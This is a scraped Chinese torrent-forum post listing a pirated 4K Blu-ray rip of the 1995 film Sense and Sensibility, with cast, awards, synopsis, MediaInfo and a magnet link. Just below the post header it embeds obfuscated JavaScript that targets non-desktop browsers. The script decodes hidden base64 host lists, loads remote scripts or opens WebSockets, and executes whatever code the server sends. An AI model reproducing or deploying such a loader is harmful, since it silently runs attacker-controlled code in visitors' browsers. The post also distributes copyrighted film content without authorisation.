理智与情感[国语配音/中文字幕].Sense.and.Sensibility.1995.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.2Audio.x265-10bit 22.83GB

版主小s 21天前 106

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 理智与情感 / 理性与感性

◎片 名 Sense and Sensibility

◎年 代 1995

◎产 地 美国 / 英国

◎类 别 剧情 / 爱情

◎语 言 英语 / 法语

◎上映日期 1995-12-04(加州首映) / 1996-01-26(美国)

◎IMDb链接 https://www.imdb.com/title/tt0114388/

◎豆瓣评分 8.4/10 (112121人评价)

◎豆瓣链接 https://movie.douban.com/subject/1299193/

◎片 长 136分钟

◎导 演 李安 Ang Lee (id:1054421)

◎编 剧 艾玛·汤普森 Emma Thompson (id:1054514)

简·奥斯汀 Jane Austen (id:1036703)

◎演 员 艾玛·汤普森 Emma Thompson (id:1054514)

凯特·温丝莱特 Kate Winslet (id:1054446)

休·格兰特 Hugh Grant (id:1003493)

艾伦·瑞克曼 Alan Rickman (id:1025153)

汤姆·威尔金森 Tom Wilkinson (id:1036397)

杰玛·琼斯 Gemma Jones (id:1036553)

哈丽特·瓦尔特 Harriet Walter (id:1162870)

埃米莉·弗朗索瓦 Emilie Fran?ois (id:1343318)

詹姆斯·弗雷特 James Fleet (id:1325362)

伊丽莎白·斯普里格斯 Elizabeth Spriggs (id:1157042)

罗伯特·哈迪 Robert Hardy (id:1102043)

伊恩·布林布尔 Ian Brimble (id:1343416)

伊莎贝尔·埃米亚斯 Isabelle Amyes (id:1059061)

格雷·怀斯 Greg Wise (id:1044976)

亚历山大·约翰 Alexander John (id:1390085)

艾美达·斯丹顿 Imelda Staunton (id:1013856)

伊莫金·斯塔布斯 Imogen Stubbs (id:1149239)

休·劳瑞 Hugh Laurie (id:1109531)

阿伦·米切尔 Allan Mitchell (id:1390086)

约瑟芬·格拉德威尔 Josephine Gradwell (id:1390087)

理查德·拉姆斯登 Richard Lumsden (id:1009638)

洛恩·马德森 Lone Madsen (id:1343319)

奥利弗·福德·戴维斯 Oliver Ford Davies (id:1079915)

埃丽诺·麦克里迪 Eleanor McCready (id:1390088)

林赛·多兰 Lindsay Doran (id:1282598)

詹姆斯·夏慕斯 James Schamus (id:1050276)

林赛·多兰 Lindsay Doran (id:1282598)

西德尼·波拉克 Sydney Pollack (id:1010608)

帕特里克·道尔 Patrick Doyle (id:1000556)

迈克尔·库尔特 Michael Coulter (id:1281370)

蒂姆·斯奎尔斯 Tim Squyres (id:1298208)

伊恩·惠特克 Ian Whittaker (id:1300844)

露西安娜·阿瑞吉 Luciana Arrighi (id:1276211)

Andrew Sanders Andrew Sanders (id:1296614)

珍妮·碧万 Jenny Beavan (id:1278169)

约翰·布莱特 John Bright (id:1279303)

Sallie Jaye Sallie Jaye (id:1287636)

简·阿齐巴德 Jan Archibald (id:1277362)

莫拉格·罗斯 Morag Ross (id:1296145)

Christopher Newman Christopher Newman (id:1132033)

Mick Ward Mick Ward (id:1012817)

◎标 签 李安 / 英国 / 爱情 / 名著改编 / 经典 / 简·奥斯汀 / KateWinslet / 美国

◎简 介

老庄园主去世后,可怜的母女四人被长子逐出了庄园。靠着亲戚的帮助,她们在一处小小的农舍安顿下来。势力眼的长嫂未曾想到的是,她的弟弟爱德华(休·格兰特 饰)爱上了三姐妹中的大姐埃莉诺(艾玛·汤普森 饰)。理智的埃莉诺尽管也倾心于爱德华,却顾及两人地位的悬殊而努力克制着自己的感情。

与此同时,妹妹玛丽安娜(凯特·温丝莱特 饰)和英俊的军官威罗比(格雷·怀斯 饰)陷入热恋。情感外露的玛丽安娜热情奔放的释放着自己对威罗比的爱慕,甚至不顾及伤害追求者布兰登(艾伦·瑞克曼 饰)上校的感情。未曾想,威罗比为人不正,根本没有把玛丽安娜的感情真正放在心上。两个姐妹的感情相继陷入了危机。

性格迥异的两姐妹谁能得到真正的爱情,如愿以偿呢?母女四人又该如何走出生活的困境呢?

◎获奖情况 (共26项)

第68届奥斯卡金像奖 (1996)

最佳影片(提名)

└──林赛·多兰 (id:1282598)

最佳女主角(提名)

└──艾玛·汤普森 (id:1054514)

最佳女配角(提名)

└──凯特·温丝莱特 (id:1054446)

最佳改编剧本

└──艾玛·汤普森 (id:1054514)

最佳摄影(提名)

└──迈克尔·库尔特 (id:1281370)

最佳服装设计(提名)

剧情片最佳原创配乐(提名)

└──帕特里克·道尔 (id:1000556)

第46届柏林国际电影节 (1996)

金熊奖 最佳影片

└──李安 (id:1054421)

第53届金球奖 (1996)

电影类 最佳剧情片

电影类 最佳导演(提名)

└──李安 (id:1054421)

电影类 剧情片最佳女主角(提名)

└──艾玛·汤普森 (id:1054514)

电影类 最佳女配角(提名)

└──凯特·温丝莱特 (id:1054446)

电影类 最佳编剧

└──艾玛·汤普森 (id:1054514)

电影类 最佳原创配乐(提名)

└──帕特里克·道尔 (id:1000556)

第49届英国电影学院奖 (1996)

电影奖 最佳影片

电影奖 最佳导演(提名)

└──李安 (id:1054421)

电影奖 最佳女主角

└──艾玛·汤普森 (id:1054514)

电影奖 最佳男配角(提名)

└──艾伦·瑞克曼 (id:1025153)

电影奖 最佳女配角

└──凯特·温丝莱特 (id:1054446)

电影奖 最佳女配角(提名)

└──伊丽莎白·斯普里格斯 (id:1157042)

电影奖 最佳改编剧本(提名)

└──艾玛·汤普森 (id:1054514)

电影奖 最佳摄影(提名)

电影奖 最佳化妆/发型(提名)

电影奖 最佳服装设计(提名)

电影奖 最佳艺术指导(提名)

└──露西安娜·阿瑞吉 (id:1276211)

电影奖 最佳原创音乐(提名)

└──帕特里克·道尔 (id:1000556)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 68696541665361451544377065690605843004 (0x33AE7900B2F445FD7329A1624AEC723C)

  4. Complete name : Sense.and.Sensibility.199[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 22.8 GiB

  8. Duration : 2 h 16 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 24.0 Mb/s

  11. Movie name : Sense and Sensibility 1995 2160p HDR UHD BluRay TrueHD 7.1 Atmos 2Audio [email protected]

  12. Encoded date : UTC 2021-09-30 02:56:03

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 16 min

  23. Bit rate : 18.5 Mb/s

  24. Width : 3 840 pixels

  25. Height : 2 072 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.097

  33. Stream size : 17.6 GiB (77%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio #1

  47. ID : 2

  48. Format : MLP FBA 16-ch

  49. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  50. Commercial name : Dolby TrueHD with Dolby Atmos

  51. Codec ID : A_TRUEHD

  52. Duration : 2 h 16 min

  53. Bit rate mode : Variable

  54. Bit rate : 3 770 kb/s

  55. Maximum bit rate : 6 108 kb/s

  56. Channel(s) : 8 channels

  57. Channel layout : L R C LFE Ls Rs Lb Rb

  58. Sampling rate : 48.0 kHz

  59. Frame rate : 1 200.000 FPS (40 SPF)

  60. Compression mode : Lossless

  61. Stream size : 3.59 GiB (16%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No

  66. Number of dynamic objects : 11

  67. Bed channel count : 1 channel

  68. Bed channel configuration : LFE


  69. Audio #2

  70. ID : 3

  71. Format : DTS

  72. Format/Info : Digital Theater Systems

  73. Codec ID : A_DTS

  74. Duration : 2 h 16 min

  75. Bit rate mode : Constant

  76. Bit rate : 1 509 kb/s

  77. Channel(s) : 6 channels

  78. Channel layout : C L R Ls Rs LFE

  79. Sampling rate : 48.0 kHz

  80. Frame rate : 93.750 FPS (512 SPF)

  81. Bit depth : 24 bits

  82. Compression mode : Lossy

  83. Stream size : 1.44 GiB (6%)

  84. Title : Mandarin

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #1

  89. ID : 4

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 2 h 15 min

  95. Bit rate : 42.7 kb/s

  96. Count of elements : 3848

  97. Stream size : 41.4 MiB (0%)

  98. Title : ENG

  99. Language : English

  100. Default : Yes

  101. Forced : No


  102. Text #2

  103. ID : 5

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 2 h 10 min

  109. Bit rate : 23.6 kb/s

  110. Count of elements : 2207

  111. Stream size : 22.1 MiB (0%)

  112. Title : CHT

  113. Language : Chinese

  114. Default : No

  115. Forced : No


  116. Text #3

  117. ID : 6

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 2 h 10 min

  123. Bit rate : 28.7 kb/s

  124. Count of elements : 3053

  125. Stream size : 26.8 MiB (0%)

  126. Title : CHS

  127. Language : Chinese

  128. Default : No

  129. Forced : No


  130. Text #4

  131. ID : 7

  132. Format : PGS

  133. Muxing mode : zlib

  134. Codec ID : S_HDMV/PGS

  135. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  136. Duration : 2 h 10 min

  137. Bit rate : 30.2 kb/s

  138. Count of elements : 3053

  139. Stream size : 28.2 MiB (0%)

  140. Title : CHT

  141. Language : Chinese

  142. Default : No

  143. Forced : No


  144. Text #5

  145. ID : 8

  146. Format : PGS

  147. Muxing mode : zlib

  148. Codec ID : S_HDMV/PGS

  149. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  150. Duration : 2 h 10 min

  151. Bit rate : 44.7 kb/s

  152. Count of elements : 3053

  153. Stream size : 41.8 MiB (0%)

  154. Title : CHS&ENG

  155. Language : Chinese

  156. Default : No

  157. Forced : No


  158. Text #6

  159. ID : 9

  160. Format : PGS

  161. Muxing mode : zlib

  162. Codec ID : S_HDMV/PGS

  163. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  164. Duration : 2 h 10 min

  165. Bit rate : 45.7 kb/s

  166. Count of elements : 3053

  167. Stream size : 42.7 MiB (0%)

  168. Title : CHT&ENG

  169. Language : Chinese

  170. Default : No

  171. Forced : No


  172. Menu

  173. 00:00:00.000 : en:Chapter 01

  174. 00:08:46.775 : en:Chapter 02

  175. 00:15:59.792 : en:Chapter 03

  176. 00:23:25.153 : en:Chapter 04

  177. 00:32:14.891 : en:Chapter 05

  178. 00:41:07.715 : en:Chapter 06

  179. 00:51:08.023 : en:Chapter 07

  180. 00:55:04.967 : en:Chapter 08

  181. 01:04:37.164 : en:Chapter 09

  182. 01:16:48.311 : en:Chapter 10

  183. 01:24:15.425 : en:Chapter 11

  184. 01:33:49.832 : en:Chapter 12

  185. 01:39:50.609 : en:Chapter 13

  186. 01:48:25.707 : en:Chapter 14

  187. 01:57:53.690 : en:Chapter 15

  188. 02:06:06.015 : en:Chapter 16




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:0F671C8089A874B36D59D6F55B0B4580E3D7BBB0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回